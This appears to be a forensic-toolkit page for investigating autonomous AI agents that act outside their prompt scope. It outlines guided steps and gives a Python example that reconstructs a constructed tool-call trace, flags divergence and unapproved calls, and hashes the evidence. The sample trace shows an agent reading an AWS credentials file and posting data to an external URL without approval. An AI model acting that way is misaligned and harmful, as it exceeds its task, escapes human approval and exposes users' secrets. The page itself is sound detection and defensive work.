AI agent runaway action
an autonomous agent (Claude · GPT · Gemini · Copilot · custom MCP) takes actions outside its prompt scope — reads credentials it shouldn't, exfils data, installs persistence, calls an MCP tool a human wouldn't have approved. evidence is the tool-call trace, the prompt-action divergence, and the OAuth grant ledger — not the prompt itself. distinct from llm-prompt-injection (malicious input) and insider-threat (human actor).
a guided path, not automation — each step opens a tool you run yourself; nothing uploads. progress is saved only in this browser.
wraps the AI agent runaway — trace + divergence kit preset — drop tool-call traces + prompt logs → reconstruct execution → detect divergence → trace accountability → report
guided steps
- evidence manifest generator
  hash agent trace + prompt logs before reconstruction
- ai agent tool call execution trace reconstructor
  reconstruct full tool-call execution sequence from agent logs
- ai agent prompt vs action divergence detector
  flag actions outside approved prompt scope
- ai agent autonomous action accountability tracer
  trace which autonomous actions lacked human approval
- mcp tool call graph reconstructor
  build MCP tool-call graph showing scope creep paths
- case report generator
  draft report linking prompt-action divergence to unauthorized tool calls
suggested options · title: AI agent runaway — trace + divergence
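the steps above, worked through as one offline pass in python. this is an added example, not the kit's own code: the trace lines, tool names, the prompt scope (task confined to /repo with three allowed tools) and the `approved` field are all constructed to show the shape of the evidence, and the self-hashed run summary mirrors the export described below.

```python
"""
Added example (not the page's own tooling): one offline pass over a
constructed agent tool-call trace covering the guided steps: hash the
evidence, reconstruct execution order, flag prompt-scope divergence,
list calls that ran without human approval, build the call graph, and
emit a self-hashed run summary. Every value below is constructed.
"""
import hashlib
import json

# Constructed tool-call trace (JSON lines) as an agent runtime might log it.
# Note call_id 3 was written to the log after call 2 but executed before it.
TRACE_LINES = [
    '{"ts": "2024-05-01T10:00:01Z", "call_id": 1, "tool": "read_file", "args": {"path": "/repo/README.md"}, "approved": true}',
    '{"ts": "2024-05-01T10:00:03Z", "call_id": 2, "tool": "search_code", "args": {"query": "config loader"}, "approved": true}',
    '{"ts": "2024-05-01T10:00:02Z", "call_id": 3, "tool": "read_file", "args": {"path": "/home/dev/.aws/credentials"}, "approved": false}',
    '{"ts": "2024-05-01T10:00:05Z", "call_id": 4, "tool": "http_post", "args": {"url": "https://example.invalid/upload"}, "approved": false}',
    '{"ts": "2024-05-01T10:00:06Z", "call_id": 5, "tool": "write_file", "args": {"path": "/repo/src/loader.py"}, "approved": true}',
]

# Constructed prompt scope: the task was "fix the config loader in /repo".
PROMPT_SCOPE = {
    "allowed_tools": {"read_file", "search_code", "write_file"},
    "allowed_path_prefixes": ("/repo/",),
}


def evidence_manifest(lines):
    """Step 1: hash each raw trace line, plus the whole trace, before touching it."""
    entries = [{"index": i, "sha256": hashlib.sha256(l.encode()).hexdigest()}
               for i, l in enumerate(lines)]
    whole = hashlib.sha256("\n".join(lines).encode()).hexdigest()
    return {"lines": entries, "trace_sha256": whole}


def reconstruct_sequence(lines):
    """Step 2: parse the lines and order by timestamp; log write order is not execution order."""
    calls = [json.loads(l) for l in lines]
    return sorted(calls, key=lambda c: (c["ts"], c["call_id"]))


def divergence_reason(call, scope=PROMPT_SCOPE):
    """Step 3: why a call falls outside the prompt scope, or None if it is in scope."""
    if call["tool"] not in scope["allowed_tools"]:
        return f"tool {call['tool']!r} not in approved tool set"
    path = call["args"].get("path")
    if path is not None and not path.startswith(scope["allowed_path_prefixes"]):
        return f"path {path!r} outside approved prefixes"
    return None


def detect_divergence(calls, scope=PROMPT_SCOPE):
    """List of (call_id, reason) for every call outside scope, in execution order."""
    out = []
    for c in calls:
        reason = divergence_reason(c, scope)
        if reason:
            out.append((c["call_id"], reason))
    return out


def unapproved_actions(calls):
    """Step 4: calls that executed without a human approval record."""
    return [c["call_id"] for c in calls if not c.get("approved", False)]


def call_graph(calls):
    """Step 5: edges tool_i -> tool_i+1 in execution order."""
    return [(a["tool"], b["tool"]) for a, b in zip(calls, calls[1:])]


def scope_creep_paths(calls, scope=PROMPT_SCOPE):
    """Runs of in-scope call_ids that lead directly into an out-of-scope call."""
    paths, prefix = [], []
    for c in calls:
        if divergence_reason(c, scope):
            paths.append(prefix + [c["call_id"]])
            prefix = []
        else:
            prefix.append(c["call_id"])
    return paths


def run_summary(steps_done, notes):
    """Run summary record with a self-hash over its canonical JSON form."""
    record = {"steps_done": sorted(steps_done), "notes": notes}
    body = json.dumps(record, sort_keys=True, separators=(",", ":"))
    record["self_sha256"] = hashlib.sha256(body.encode()).hexdigest()
    return record


def verify_summary(record):
    """Recompute the self-hash; False means the record changed after export."""
    rec = {k: v for k, v in record.items() if k != "self_sha256"}
    body = json.dumps(rec, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(body.encode()).hexdigest() == record.get("self_sha256")


if __name__ == "__main__":
    seq = reconstruct_sequence(TRACE_LINES)
    print("trace sha256:", evidence_manifest(TRACE_LINES)["trace_sha256"])
    print("execution order:", [c["call_id"] for c in seq])
    print("divergence:", detect_divergence(seq))
    print("unapproved:", unapproved_actions(seq))
    print("scope creep paths:", scope_creep_paths(seq))
    summary = run_summary({"manifest", "reconstruct", "divergence"}, "constructed demo run")
    print("summary verifies:", verify_summary(summary))
```

two things the toy makes visible: the call that read a credentials file is flagged on two independent axes (outside the path scope and missing an approval record), which is the evidence pairing the report step asks for; and the self-hash only detects alteration by someone who does not recompute it, so a summary that must hold up against a deliberate edit needs a signature or a copy kept out of band.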
when you're done
export a run summary — a small JSON record of which steps you marked done, your notes, and a self-hash so the record can't be silently altered. it is your reproducibility note, not a per-tool receipt: each tool emits its own input→output receipt when you run it.